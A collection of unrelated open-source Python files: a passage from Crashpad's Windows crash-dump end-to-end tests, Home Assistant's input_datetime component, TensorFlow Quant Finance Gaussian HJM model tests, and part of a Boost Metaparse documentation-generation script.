os.path.join(out_dir, 'crashpad_handler.com'),
'--pipe-name=' + pipe_name, '--database=' + test_database
])
# Wait until the server is ready.
printed = False
while not NamedPipeExistsAndReady(pipe_name):
if not printed:
print('Waiting for crashpad_handler to be ready...')
printed = True
time.sleep(0.001)
command = [os.path.join(out_dir, executable_name), pipe_name
] + list(args)
else:
command = ([
os.path.join(out_dir, executable_name),
os.path.join(out_dir, 'crashpad_handler.com'), test_database
] + list(args))
print('Running %s' % os.path.basename(command[0]))
exit_code = subprocess.call(command)
if exit_code != expect_exit_code:
raise subprocess.CalledProcessError(exit_code, executable_name)
out = subprocess.check_output([
os.path.join(out_dir, 'crashpad_database_util.exe'),
'--database=' + test_database,
'--show-pending-reports',
'--show-all-report-info',
])
for line in out.splitlines():
if line.strip().startswith('Path:'):
return line.partition(':')[2].strip()
finally:
if handler:
handler.kill()
def GetDumpFromCrashyProgram(out_dir, pipe_name):
return GetDumpFromProgram(out_dir, pipe_name, 'crashy_program.exe',
win32con.EXCEPTION_ACCESS_VIOLATION)
def GetDumpFromOtherProgram(out_dir, pipe_name, *args):
return GetDumpFromProgram(out_dir, pipe_name, 'crash_other_program.exe', 0,
*args)
def GetDumpFromSignal(out_dir, pipe_name, *args):
STATUS_FATAL_APP_EXIT = 0x40000015 # Not known by win32con.
return GetDumpFromProgram(out_dir, pipe_name, 'crashy_signal.exe',
STATUS_FATAL_APP_EXIT, *args)
def GetDumpFromSelfDestroyingProgram(out_dir, pipe_name):
return GetDumpFromProgram(out_dir, pipe_name, 'self_destroying_program.exe',
win32con.EXCEPTION_BREAKPOINT)
def GetDumpFromZ7Program(out_dir, pipe_name):
return GetDumpFromProgram(out_dir, pipe_name, 'crashy_z7_loader.exe',
win32con.EXCEPTION_ACCESS_VIOLATION)
class CdbRun(object):
"""Run cdb.exe passing it a cdb command and capturing the output.
`Check()` searches for regex patterns in sequence allowing verification of
expected output.
"""
def __init__(self, cdb_path, dump_path, command):
# Run a command line that loads the dump, runs the specified cdb
# command, and then quits, and capturing stdout.
self.out = subprocess.check_output(
[cdb_path, '-z', dump_path, '-c', command + ';q'])
def Check(self, pattern, message, re_flags=0):
match_obj = re.search(pattern, self.out, re_flags)
if match_obj:
# Matched. Consume up to end of match.
self.out = self.out[match_obj.end(0):]
print('ok - %s' % message)
sys.stdout.flush()
else:
print('-' * 80, file=sys.stderr)
print('FAILED - %s' % message, file=sys.stderr)
print('-' * 80, file=sys.stderr)
print('did not match:\n %s' % pattern, file=sys.stderr)
print('-' * 80, file=sys.stderr)
print('remaining output was:\n %s' % self.out, file=sys.stderr)
print('-' * 80, file=sys.stderr)
sys.stderr.flush()
global g_had_failures
g_had_failures = True
def Find(self, pattern, re_flags=0):
match_obj = re.search(pattern, self.out, re_flags)
if match_obj:
# Matched. Consume up to end of match.
self.out = self.out[match_obj.end(0):]
return match_obj
return None
def RunTests(cdb_path, dump_path, start_handler_dump_path, destroyed_dump_path,
z7_dump_path, other_program_path, other_program_no_exception_path,
sigabrt_main_path, sigabrt_background_path, pipe_name):
"""Runs various tests in sequence. Runs a new cdb instance on the dump for
each block of tests to reduce the chances that output from one command is
confused for output from another.
"""
out = CdbRun(cdb_path, dump_path, '.ecxr')
out.Check('This dump file has an exception of interest stored in it',
'captured exception')
# When SomeCrashyFunction is inlined, cdb doesn't demangle its namespace as
# "`anonymous namespace'" and instead gives the decorated form.
out.Check(
'crashy_program!crashpad::(`anonymous namespace\'|\?A0x[0-9a-f]+)::'
'SomeCrashyFunction', 'exception at correct location')
out = CdbRun(cdb_path, start_handler_dump_path, '.ecxr')
out.Check('This dump file has an exception of interest stored in it',
'captured exception (using StartHandler())')
out.Check(
'crashy_program!crashpad::(`anonymous namespace\'|\?A0x[0-9a-f]+)::'
'SomeCrashyFunction',
'exception at correct location (using StartHandler())')
out = CdbRun(cdb_path, dump_path, '!peb')
out.Check(r'PEB at', 'found the PEB')
out.Check(r'Ldr\.InMemoryOrderModuleList:.*\d+ \. \d+',
'PEB_LDR_DATA saved')
out.Check(r'Base TimeStamp Module',
'module list present')
pipe_name_escaped = pipe_name.replace('\\', '\\\\')
out.Check(r'CommandLine: *\'.*crashy_program\.exe *' + pipe_name_escaped,
'some PEB data is correct')
out.Check(r'SystemRoot=C:\\Windows', 'some of environment captured',
re.IGNORECASE)
out = CdbRun(cdb_path, dump_path, '?? @$peb->ProcessParameters')
out.Check(r' ImagePathName *: _UNICODE_STRING ".*\\crashy_program\.exe"',
'PEB->ProcessParameters.ImagePathName string captured')
out.Check(
' DesktopInfo *: '
'_UNICODE_STRING "(?!--- memory read error at address ).*"',
'PEB->ProcessParameters.DesktopInfo string captured')
out = CdbRun(cdb_path, dump_path, '!teb')
out.Check(r'TEB at', 'found the TEB')
out.Check(r'ExceptionList:\s+[0-9a-fA-F]+', 'some valid teb data')
out.Check(r'LastErrorValue:\s+2', 'correct LastErrorValue')
out = CdbRun(cdb_path, dump_path, '!gle')
out.Check(
'LastErrorValue: \(Win32\) 0x2 \(2\) - The system cannot find the '
'file specified.', '!gle gets last error')
out.Check(
'LastStatusValue: \(NTSTATUS\) 0xc000000f - {File Not Found} The '
'file %hs does not exist.', '!gle gets last ntstatus')
if False:
# TODO(scottmg): Re-enable when we grab ntdll!RtlCriticalSectionList.
out = CdbRun(cdb_path, dump_path, '!locks')
out.Check(
r'CritSec crashy_program!crashpad::`anonymous namespace\'::'
r'g_test_critical_section', 'lock was captured')
if platform.win32_ver()[0] != '7':
# We can't allocate CRITICAL_SECTIONs with .DebugInfo on Win 7.
out.Check(r'\*\*\* Locked',
'lock debug info was captured, and is locked')
out = CdbRun(cdb_path, dump_path, '!handle')
out.Check(r'\d+ Handles', 'captured handles')
out.Check(r'Event\s+\d+', 'capture some event handles')
out.Check(r'File\s+\d+', 'capture some file handles')
out = CdbRun(cdb_path, dump_path, 'lm')
out.Check(r'Unloaded modules:', 'captured some unloaded modules')
out.Check(r'lz32\.dll', 'found expected unloaded module lz32')
out.Check(r'wmerror\.dll', 'found expected unloaded module wmerror')
out = CdbRun(cdb_path, destroyed_dump_path, '.ecxr;!peb;k 2')
out.Check(r'Ldr\.InMemoryOrderModuleList:.*\d+ \. \d+',
'PEB_LDR_DATA saved')
out.Check(r'ntdll\.dll', 'ntdll present', re.IGNORECASE)
# Check that there is no stack trace in the self-destroyed process. Confirm
# that the top is where we expect it (that's based only on IP), but
# subsequent stack entries will not be available. This confirms that we have
# a mostly valid dump, but that the stack was omitted.
out.Check(
r'self_destroying_program!crashpad::`anonymous namespace\'::'
r'FreeOwnStackAndBreak.*\nquit:',
'at correct location, no additional stack entries')
# Dump memory pointed to be EDI on the background suspended thread. We don't
# know the index of the thread because the system may have started other
# threads, so first do a run to extract the thread index that's suspended,
# and then another run to dump the data pointed to by EDI for that thread.
out = CdbRun(cdb_path, dump_path, '.ecxr;~')
match_obj = out.Find(r'(\d+)\s+Id: [0-9a-f.]+ Suspend: 1 Teb:')
if match_obj:
thread = match_obj.group(1)
out = CdbRun(cdb_path, dump_path, '.ecxr;~' + thread + 's;db /c14 edi')
out.Check(r'63 62 61 60 5f 5e 5d 5c-5b 5a 59 58 57 56 55 54 53 52 51 50',
'data pointed to by registers captured')
# Move up one stack frame after jumping to the exception, and examine
# memory.
out = CdbRun(cdb_path, dump_path,
'.ecxr; .f+; dd /c100 poi(offset_pointer)-20')
out.Check(
r'80000078 00000079 8000007a 0000007b 8000007c 0000007d 8000007e '
r'0000007f 80000080 00000081 80000082 00000083 80000084 00000085 '
r'80000086 00000087 80000088 00000089 8000008a 0000008b 8000008c '
r'0000008d 8000008e 0000008f 80000090 00000091 80000092 00000093 '
r'80000094 00000095 80000096 00000097',
'data pointed to by stack captured')
# Attempt to retrieve the value of g_extra_memory_pointer (by name), and
# then examine the memory at which it points. Both should have been saved.
out = CdbRun(
cdb_path, dump_path,
'dd poi(crashy_program!crashpad::g_extra_memory_pointer)+0x1f30 '
'L8')
out.Check(r'0000655e 0000656b 00006578 00006585',
'extra memory range captured')
out = CdbRun(cdb_path, dump_path, '.dumpdebug')
out.Check(r'type \?\?\? \(333333\), size 00001000', 'first user stream')
out.Check(r'type \?\?\? \(222222\), size 00000080', 'second user stream')
if z7_dump_path:
out = CdbRun(cdb_path, z7_dump_path, '.ecxr;lm')
out.Check('This dump file has an exception of interest stored in it',
'captured exception in z7 module')
# Older versions of cdb display relative to exports for /Z7 modules,
# newer ones just display the offset.
out.Check(r'z7_test(!CrashMe\+0xe|\+0x100e):',
'exception in z7 at correct location')
out.Check(r'z7_test C \(codeview symbols\) z7_test\.dll',
'expected non-pdb symbol format')
out = CdbRun(cdb_path, other_program_path, '.ecxr;k;~')
out.Check('Unknown exception - code deadbea7',
'other program dump exception code')
out.Check('!Sleep', 'other program reasonable location')
out.Check("hanging_program!`anonymous namespace'::Thread1",
'other program dump right thread')
count = 0
while True:
match_obj = out.Find(r'Id.*Suspend: (\d+) ')
if match_obj:
if match_obj.group(1) != '0':
out.Check(r'FAILED', 'all suspend counts should be 0')
else:
count += 1
else:
break
assert count > 2
out = CdbRun(cdb_path, other_program_no_exception_path, '.ecxr;k')
out.Check('Unknown exception - code 0cca11ed',
'other program with no exception given')
out.Check('!RaiseException', 'other program in RaiseException()')
out = CdbRun(cdb_path, sigabrt_main_path, '.ecxr')
out.Check('code 40000015', 'got sigabrt signal')
out.Check('::HandleAbortSignal', ' stack in expected location')
out = CdbRun(cdb_path, sigabrt_background_path, '.ecxr')
out.Check('code 40000015', 'got sigabrt signal from background thread')
def main(args):
try:
if len(args) != 1:
print('must supply binary dir', file=sys.stderr)
return 1
cdb_path = GetCdbPath()
if not cdb_path:
print('could not find cdb', file=sys.stderr)
return 1
# Make sure we can download Windows symbols.
if not os.environ.get('_NT_SYMBOL_PATH'):
symbol_dir = MakeTempDir()
protocol = 'https' if platform.win32_ver()[0] != 'XP' else 'http'
os.environ['_NT_SYMBOL_PATH'] = (
'SRV*' + symbol_dir + '*' + protocol +
'://msdl.microsoft.com/download/symbols')
pipe_name = r'\\.\pipe\end-to-end_%s_%s' % (os.getpid(),
str(random.getrandbits(64)))
crashy_dump_path = GetDumpFromCrashyProgram(args[0], pipe_name)
if not crashy_dump_path:
return 1
start_handler_dump_path = GetDumpFromCrashyProgram(args[0], None)
if not start_handler_dump_path:
return 1
destroyed_dump_path = GetDumpFromSelfDestroyingProgram(
args[0], pipe_name)
if not destroyed_dump_path:
return 1
z7_dump_path = None
if not args[0].endswith('_x64'):
z7_dump_path = GetDumpFromZ7Program(args[0], pipe_name)
if not z7_dump_path:
return 1
other_program_path = GetDumpFromOtherProgram(args[0], pipe_name)
if not other_program_path:
return 1
other_program_no_exception_path = GetDumpFromOtherProgram(
args[0], pipe_name, 'noexception')
if not other_program_no_exception_path:
return 1
sigabrt_main_path = GetDumpFromSignal(args[0], pipe_name, 'main')
if not sigabrt_main_path:
return 1
sigabrt_background_path = GetDumpFromSignal(args[0], pipe_name,
'background')
if not sigabrt_background_path:
return 1
RunTests(cdb_path, crashy_dump_path, start_handler_dump_path,
destroyed_dump_path, z7_dump_path, other_program_path,
other_program_no_exception_path, sigabrt_main_path,
sigabrt_background_path, pipe_name)
return 1 if g_had_failures else 0
finally:
CleanUpTempDirs()
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
|
"""Support to select a date and/or a time."""
import logging
import datetime
import voluptuous as vol
from homeassistant.const import ATTR_DATE, ATTR_TIME, CONF_ICON, CONF_NAME
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.config_validation import ENTITY_SERVICE_SCHEMA
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.helpers.restore_state import RestoreEntity
from homeassistant.util import dt as dt_util
_LOGGER = logging.getLogger(__name__)
DOMAIN = "input_datetime"
ENTITY_ID_FORMAT = DOMAIN + ".{}"
CONF_HAS_DATE = "has_date"
CONF_HAS_TIME = "has_time"
CONF_INITIAL = "initial"
DEFAULT_VALUE = "1970-01-01 00:00:00"
ATTR_DATETIME = "datetime"
SERVICE_SET_DATETIME = "set_datetime"
SERVICE_SET_DATETIME_SCHEMA = ENTITY_SERVICE_SCHEMA.extend(
{
vol.Optional(ATTR_DATE): cv.date,
vol.Optional(ATTR_TIME): cv.time,
vol.Optional(ATTR_DATETIME): cv.datetime,
}
)
def has_date_or_time(conf):
"""Check at least date or time is true."""
if conf[CONF_HAS_DATE] or conf[CONF_HAS_TIME]:
return conf
raise vol.Invalid("Entity needs at least a date or a time")
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: cv.schema_with_slug_keys(
vol.All(
{
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_HAS_DATE, default=False): cv.boolean,
vol.Optional(CONF_HAS_TIME, default=False): cv.boolean,
vol.Optional(CONF_ICON): cv.icon,
vol.Optional(CONF_INITIAL): cv.string,
},
has_date_or_time,
)
)
},
extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass, config):
"""Set up an input datetime."""
component = EntityComponent(_LOGGER, DOMAIN, hass)
entities = []
for object_id, cfg in config[DOMAIN].items():
name = cfg.get(CONF_NAME)
has_time = cfg.get(CONF_HAS_TIME)
has_date = cfg.get(CONF_HAS_DATE)
icon = cfg.get(CONF_ICON)
initial = cfg.get(CONF_INITIAL)
entities.append(
InputDatetime(object_id, name, has_date, has_time, icon, initial)
)
if not entities:
return False
async def async_set_datetime_service(entity, call):
"""Handle a call to the input datetime 'set datetime' service."""
time = call.data.get(ATTR_TIME)
date = call.data.get(ATTR_DATE)
dttm = call.data.get(ATTR_DATETIME)
if (
dttm
and (date or time)
or entity.has_date
and not (date or dttm)
or entity.has_time
and not (time or dttm)
):
_LOGGER.error(
"Invalid service data for %s " "input_datetime.set_datetime: %s",
entity.entity_id,
str(call.data),
)
return
if dttm:
date = dttm.date()
time = dttm.time()
entity.async_set_datetime(date, time)
component.async_register_entity_service(
SERVICE_SET_DATETIME, SERVICE_SET_DATETIME_SCHEMA, async_set_datetime_service
)
await component.async_add_entities(entities)
return True
class InputDatetime(RestoreEntity):
"""Representation of a datetime input."""
def __init__(self, object_id, name, has_date, has_time, icon, initial):
"""Initialize a select input."""
self.entity_id = ENTITY_ID_FORMAT.format(object_id)
self._name = name
self.has_date = has_date
self.has_time = has_time
self._icon = icon
self._initial = initial
self._current_datetime = None
async def async_added_to_hass(self):
"""Run when entity about to be added."""
await super().async_added_to_hass()
restore_val = None
# Priority 1: Initial State
if self._initial is not None:
restore_val = self._initial
# Priority 2: Old state
if restore_val is None:
old_state = await self.async_get_last_state()
if old_state is not None:
restore_val = old_state.state
if not self.has_date:
if not restore_val:
restore_val = DEFAULT_VALUE.split()[1]
self._current_datetime = dt_util.parse_time(restore_val)
elif not self.has_time:
if not restore_val:
restore_val = DEFAULT_VALUE.split()[0]
self._current_datetime = dt_util.parse_date(restore_val)
else:
if not restore_val:
restore_val = DEFAULT_VALUE
self._current_datetime = dt_util.parse_datetime(restore_val)
@property
def should_poll(self):
"""If entity should be polled."""
return False
@property
def name(self):
"""Return the name of the select input."""
return self._name
@property
def icon(self):
"""Return the icon to be used for this entity."""
return self._icon
@property
def state(self):
"""Return the state of the component."""
return self._current_datetime
@property
def state_attributes(self):
"""Return the state attributes."""
attrs = {"has_date": self.has_date, "has_time": self.has_time}
if self._current_datetime is None:
return attrs
if self.has_date and self._current_datetime is not None:
attrs["year"] = self._current_datetime.year
attrs["month"] = self._current_datetime.month
attrs["day"] = self._current_datetime.day
if self.has_time and self._current_datetime is not None:
attrs["hour"] = self._current_datetime.hour
attrs["minute"] = self._current_datetime.minute
attrs["second"] = self._current_datetime.second
if not self.has_date:
attrs["timestamp"] = (
self._current_datetime.hour * 3600
+ self._current_datetime.minute * 60
+ self._current_datetime.second
)
elif not self.has_time:
extended = datetime.datetime.combine(
self._current_datetime, datetime.time(0, 0)
)
attrs["timestamp"] = extended.timestamp()
else:
attrs["timestamp"] = self._current_datetime.timestamp()
return attrs
def async_set_datetime(self, date_val, time_val):
"""Set a new date / time."""
if self.has_date and self.has_time and date_val and time_val:
self._current_datetime = datetime.datetime.combine(date_val, time_val)
elif self.has_date and not self.has_time and date_val:
self._current_datetime = date_val
if self.has_time and not self.has_date and time_val:
self._current_datetime = time_val
self.async_schedule_update_ha_state()
|
|
# Lint as: python3
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for Gaussian HJM module."""
from absl.testing import parameterized
import numpy as np
import tensorflow.compat.v2 as tf
import tf_quant_finance as tff
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import
@test_util.run_all_in_graph_and_eager_modes
class GaussianHJMModelTest(parameterized.TestCase, tf.test.TestCase):
def setUp(self):
self.instant_forward_rate = lambda *args: [0.01]
# See D. Brigo, F. Mercurio. Interest Rate Models. 2007.
def _true_std_time_dep(t, intervals, vol, k):
res = np.zeros_like(t, dtype=np.float64)
for i, tt in enumerate(t):
var = 0.0
for j in range(len(intervals) - 1):
if tt >= intervals[j] and tt < intervals[j + 1]:
var = var + vol[j]**2 / 2 / k * (
np.exp(2 * k * tt) - np.exp(2 * k * intervals[j]))
break
else:
var = var + vol[j]**2 / 2 / k * (
np.exp(2 * k * intervals[j + 1]) - np.exp(2 * k * intervals[j]))
else:
var = var + vol[-1]**2/2/k *(np.exp(2*k*tt)-np.exp(2*k*intervals[-1]))
res[i] = np.exp(-k*tt) * np.sqrt(var)
return res
self.true_std_time_dep = _true_std_time_dep
def _true_zcb_std(t, tau, v, k):
e_tau = np.exp(-k*tau)
et = np.exp(k*t)
val = v/k * (1. - e_tau*et) * np.sqrt((1.-1./et/et)/k/2)
return val
self.true_zcb_std = _true_zcb_std
super(GaussianHJMModelTest, self).setUp()
@parameterized.named_parameters(
{
'testcase_name': '1f_constant',
'dim': 1,
'mr': [0.03],
'vol': [0.01],
'corr': None,
'vol_jumps': None,
'vol_values': None,
'num_time_steps': None,
'dtype': tf.float32,
},
{
'testcase_name': '1f_constant_num_time_steps',
'dim': 1,
'mr': [0.03],
'vol': [0.01],
'corr': None,
'vol_jumps': None,
'vol_values': None,
'num_time_steps': 21,
'dtype': tf.float64,
},
{
'testcase_name': '1f_time_dep',
'dim': 1,
'mr': [0.03],
'vol': None,
'corr': None,
'vol_jumps': [[0.5, 1.0]],
'vol_values': [[0.01, 0.02, 0.01]],
'num_time_steps': None,
'dtype': None,
},
{
'testcase_name': '2f_constant',
'dim': 2,
'mr': [0.03, 0.1],
'vol': [0.005, 0.012],
'corr': None,
'vol_jumps': None,
'vol_values': None,
'num_time_steps': None,
'dtype': tf.float64,
},
{
'testcase_name': '2f_constant_with_corr',
'dim': 2,
'mr': [0.03, 0.1],
'vol': [0.005, 0.012],
'corr': [[1.0, 0.5], [0.5, 1.0]],
'vol_jumps': None,
'vol_values': None,
'num_time_steps': None,
'dtype': tf.float64,
},
{
'testcase_name': '2f_time_dep',
'dim': 2,
'mr': [0.03, 0.1],
'vol': None,
'corr': None,
'vol_jumps': [[0.5, 1.0], [0.5, 1.0]],
'vol_values': [[0.005, 0.008, 0.005], [0.005, 0.008, 0.005]],
'num_time_steps': None,
'dtype': tf.float64,
}
)
def test_correctness_rate_df_sims(self, dim, mr, vol, corr, vol_jumps,
vol_values, num_time_steps, dtype):
"""Tests short rate and discount factor simulations."""
if vol is None:
vol = tff.math.piecewise.PiecewiseConstantFunc(vol_jumps, vol_values,
dtype=dtype)
time_step = None if num_time_steps else 0.1
num_samples = 100000
process = tff.models.hjm.GaussianHJM(
dim=dim,
mean_reversion=mr,
volatility=vol,
initial_discount_rate_fn=self.instant_forward_rate,
corr_matrix=corr,
dtype=dtype)
times = np.array([0.1, 0.5, 1.0, 2.0])
paths, df, _, _ = process.sample_paths(
times,
num_samples=num_samples,
time_step=time_step,
num_time_steps=num_time_steps,
random_type=tff.math.random.RandomType.STATELESS_ANTITHETIC,
seed=[1, 2],
skip=1000000)
if dtype is not None:
with self.subTest('Dtype'):
self.assertEqual(paths.dtype, dtype)
paths = self.evaluate(paths)
df = self.evaluate(df)
with self.subTest('ShapePaths'):
self.assertAllEqual(paths.shape, [num_samples, 4])
with self.subTest('ShapeDiscountFactors'):
self.assertAllEqual(df.shape, [num_samples, 4])
discount_mean = np.mean(df, axis=0)
expected_mean = np.exp(-0.01 * times)
with self.subTest('DiscountMean'):
self.assertAllClose(discount_mean, expected_mean, rtol=1e-3, atol=1e-3)
@parameterized.named_parameters(
{
'testcase_name': '1f_constant',
'dim': 1,
'mr': [0.03],
'vol': [0.005],
'corr': None,
'factor': 1.0,
},
{
'testcase_name': '2f_constant',
'dim': 2,
'mr': [0.03, 0.03],
'vol': [0.005, 0.005],
'corr': None,
'factor': np.sqrt(2.0),
},
{
'testcase_name': '2f_constant_with_corr',
'dim': 2,
'mr': [0.03, 0.03],
'vol': [0.005, 0.005],
'corr': [[1.0, 0.5], [0.5, 1.0]],
'factor': np.sqrt(3.0),
}
)
def test_correctness_zcb_sims(self, dim, mr, vol, corr, factor):
"""Tests discount bond simulations."""
dtype = np.float64
num_samples = 100000
process = tff.models.hjm.GaussianHJM(
dim=dim,
mean_reversion=mr,
volatility=vol,
initial_discount_rate_fn=self.instant_forward_rate,
corr_matrix=corr,
dtype=dtype)
times = np.array([0.1, 0.5, 1.0, 2.0])
curve_times = np.array([0., 0.5, 1.0, 2.0, 5.0])
paths, _, _ = process.sample_discount_curve_paths(
times,
curve_times=curve_times,
num_samples=num_samples,
time_step=0.1,
random_type=tff.math.random.RandomType.STATELESS_ANTITHETIC,
seed=[1, 2],
skip=1000000)
self.assertEqual(paths.dtype, dtype)
paths = self.evaluate(paths)
self.assertAllEqual(paths.shape, [num_samples, 5, 4])
sampled_std = tf.math.reduce_std(tf.math.log(paths), axis=0)
for tidx in range(4):
true_std = self.true_zcb_std(times[tidx], curve_times + times[tidx],
0.005, 0.03)
self.assertAllClose(
sampled_std[:, tidx], factor * true_std, rtol=1e-3, atol=1e-3)
@parameterized.named_parameters(
{
'testcase_name': '1f_single_time',
'dim': 1,
'mr': [0.03],
'vol': [0.005],
'corr': None,
'times': [1.0],
'expected': [0.9803327113840525],
},
{
'testcase_name': '1f_many_times',
'dim': 1,
'mr': [0.03],
'vol': [0.005],
'corr': None,
'times': [1.0, 2.0, 3.0],
'expected': [0.9803327113840525,
0.9803218405347454,
0.9803116028646381],
},
{
'testcase_name': '2f_single_time',
'dim': 2,
'mr': [0.03, 0.03],
'vol': [0.005, 0.005],
'corr': None,
'times': [1.0],
'expected': [0.9707109604475661],
},
{
'testcase_name': '2f_many_times',
'dim': 2,
'mr': [0.03, 0.03],
'vol': [0.005, 0.005],
'corr': None,
'times': [1.0, 2.0, 3.0],
'expected': [0.9707109604475661,
0.9706894322583266,
0.9706691582097785]
}
)
def test_correctness_discount_bond_price(self, dim, mr, vol, corr, times,
expected):
"""Tests discount bond price computation."""
dtype = np.float64
process = tff.models.hjm.GaussianHJM(
dim=dim,
mean_reversion=mr,
volatility=vol,
initial_discount_rate_fn=self.instant_forward_rate,
corr_matrix=corr,
dtype=dtype)
x_t = 0.01 * np.ones(shape=(len(times), dim))
times = np.array(times)
bond_prices = self.evaluate(
process.discount_bond_price(x_t, times, times + 1.0))
self.assertAllEqual(bond_prices.shape, times.shape)
self.assertAllClose(expected, bond_prices, 1e-8, 1e-8)
if __name__ == '__main__':
tf.test.main()
|
|
#!/usr/bin/python
# Copyright Abel Sinkovics ([email protected]) 2015.
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
import sys
import argparse
import re
import os
def remove_last_dot(s):
if s.endswith('.'):
return s[:-1]
else:
return s
def remove_newline(s):
return re.sub('[\r\n]', '', s)
def is_definition(s):
cmd = s.strip()
def_prefixes = ['#include ', 'using ', 'struct ', 'template ']
return any([cmd.startswith(s) for s in def_prefixes]) or cmd.endswith(';')
def prefix_lines(prefix, s):
return '\n'.join(['%s%s' % (prefix, l) for l in s.split('\n')])
def protect_metashell(s):
if s.startswith('#include <metashell'):
return '#ifdef __METASHELL\n%s\n#endif' % (s)
else:
return s
def parse_md(qbk):
sections = []
defs = []
current_section = ''
in_cpp_snippet = False
numbered_section_header = re.compile('^\[section *([0-9.]+)')
metashell_command = re.compile('^> [^ ]')
metashell_prompt = re.compile('^(\.\.\.|)>')
msh_cmd = ''
for l in qbk:
if l.startswith(' '):
ll = l[2:]
if not in_cpp_snippet:
in_msh_cpp_snippet = True
if in_msh_cpp_snippet:
if metashell_command.match(ll) or msh_cmd != '':
cmd = metashell_prompt.sub('', remove_newline(ll))
if msh_cmd != '':
msh_cmd = msh_cmd + '\n'
msh_cmd = msh_cmd + cmd
if msh_cmd.endswith('\\'):
msh_cmd = msh_cmd[:-1].strip() + ' '
else:
if not is_definition(msh_cmd):
msh_cmd = '// query:\n%s' % (prefix_lines('// ', msh_cmd))
defs.append((current_section, protect_metashell(msh_cmd.strip())))
msh_cmd = ''
elif not in_cpp_snippet:
in_msh_cpp_snippet = False
in_cpp_snippet = True
else:
in_cpp_snippet = False
m = numbered_section_header.match(l)
if m:
current_section = remove_last_dot(m.group(1)).replace('.', '_')
sections.append(current_section)
sections.sort(key = lambda s: [int(n) for n in s.split('_')])
return (sections, defs)
def delete_old_headers(path):
for f in os.listdir(path):
if f.endswith('.hpp'):
os.remove(os.path.join(path, f))
def gen_headers(sections, defs, path):
files = {}
prev_section = ''
for s in sections:
prev_name = prev_section.replace('_', '.')
include_guard = 'BOOST_METAPARSE_GETTING_STARTED_%s_HPP' % (s)
if prev_section == '':
prev_include = ''
else:
prev_include = \
'// Definitions before section {0}\n'.format(prev_name) + \
'#include "{0}.hpp"\n'.format(prev_section) + \
'\n'
files[os.path.join(path, s + '.hpp')] = \
'#ifndef {0}\n'.format(include_guard) + \
'#define {0}\n'.format(include_guard) + \
'\n' + \
'// Automatically generated header file\n' + \
'\n' + \
prev_include + \
'// Definitions of section {0}\n'.format(prev_name) + \
'\n'.join( \
['%s\n' % (d) for (sec, d) in defs if sec == prev_section] \
) + \
'\n' + \
'#endif\n' + \
'\n'
prev_section = s
return files
def remove_metashell_protection(s):
prefix = '#ifdef __METASHELL\n'
suffix = '#endif'
return \
s[len(prefix):-len(suffix)] \
if s.startswith(prefix) and s.endswith(suffix) \
else s
def make_code_snippet(s):
return '\n'.join([' {0}'.format(l) for l in s.split('\n')])
def what_we_have_so_far_docs(doc_dir, qbk, defs, sections):
files = {}
so_far = ''
sections_with_definition = []
for s in sections:
if so_far != '':
files[os.path.join(doc_dir, 'before_{0}.qbk'.format(s))] = \
'[#before_{0}]\n[\'Definitions before section {1}]\n\n{2}\n'.format(
s,
s.replace('_', '.') + '.',
so_far
)
sections_with_definition.append(s)
so_far = so_far + '\n'.join([
'{0}\n'.format(make_code_snippet(remove_metashell_protection(d)))
for (sec, d) in defs
if sec == s and not d.startswith('//')
])
is_section = re.compile('^\[section (([0-9]\.)+)')
note_prefix = \
'[note Note that you can find everything that has been included and' \
' defined so far [link before_'
in_definitions_before_each_section = False
result = []
for l in qbk:
if in_definitions_before_each_section:
if l.strip() == '[endsect]':
in_definitions_before_each_section = False
result.append(l)
elif l.strip() == '[section Definitions before each section]':
in_definitions_before_each_section = True
result.append(l)
result.append('\n')
for s in sections_with_definition:
result.append('[include before_{0}.qbk]\n'.format(s))
result.append('\n')
elif not l.startswith(note_prefix):
result.append(l)
m = is_section.match(l)
if m:
section_number = m.group(1).replace('.', '_')[:-1]
if section_number in sections_with_definition:
result.append('{0}{1} here].]\n'.format(note_prefix, section_number))
return (files, result)
def strip_not_finished_line(s):
s = s.strip()
return s[:-1] if s.endswith('\\') else s
def make_copy_paste_friendly(lines):
result = []
for l in lines:
if l.startswith('> '):
result.append(l[2:])
elif l.startswith('...> '):
result[-1] = strip_not_finished_line(result[-1]) + l[5:].lstrip()
return result
def extract_code_snippets(qbk, fn_base):
code_prefix = ' '
files = {}
result = []
in_cpp_code = False
counter = 0
in_copy_paste_friendly_examples = False
skip_empty_lines = False
for l in qbk:
if l.strip() != '' or not skip_empty_lines:
skip_empty_lines = False
if in_copy_paste_friendly_examples:
if 'endsect' in l:
in_copy_paste_friendly_examples = False
result.append('\n')
result.extend([
'[include {0}_{1}.qbk]\n'.format(re.sub('^.*/', '', fn_base), i) \
for i in range(0, counter)
])
result.append('\n')
result.append(l)
in_copy_paste_friendly_examples = False
elif '[section Copy-paste friendly code examples]' in l:
in_copy_paste_friendly_examples = True
result.append(l)
elif 'copy-paste friendly version' in l:
skip_empty_lines = True
else:
result.append(l)
if in_cpp_code:
if not l.startswith(code_prefix):
in_cpp_code = False
if len(code) > 1:
f = '{0}_{1}'.format(fn_base, counter)
basename_f = re.sub('^.*/', '', f)
files['{0}.qbk'.format(f)] = \
'[#{0}]\n\n{1}\n'.format(
basename_f,
''.join(
[code_prefix + s for s in make_copy_paste_friendly(code)]
)
)
result.append(
'[link {0} copy-paste friendly version]\n'.format(basename_f)
)
result.append('\n')
counter = counter + 1
elif \
l.startswith(code_prefix + '> ') \
or l.startswith(code_prefix + '...> '):
code.append(l[len(code_prefix):])
elif l.startswith(code_prefix):
in_cpp_code = True
code = [l[len(code_prefix):]]
return (files, result)
def write_file(fn, content):
with open(fn, 'w') as f:
f.write(content)
def write_files(files):
for fn in files:
write_file(fn, files[fn])
def main():
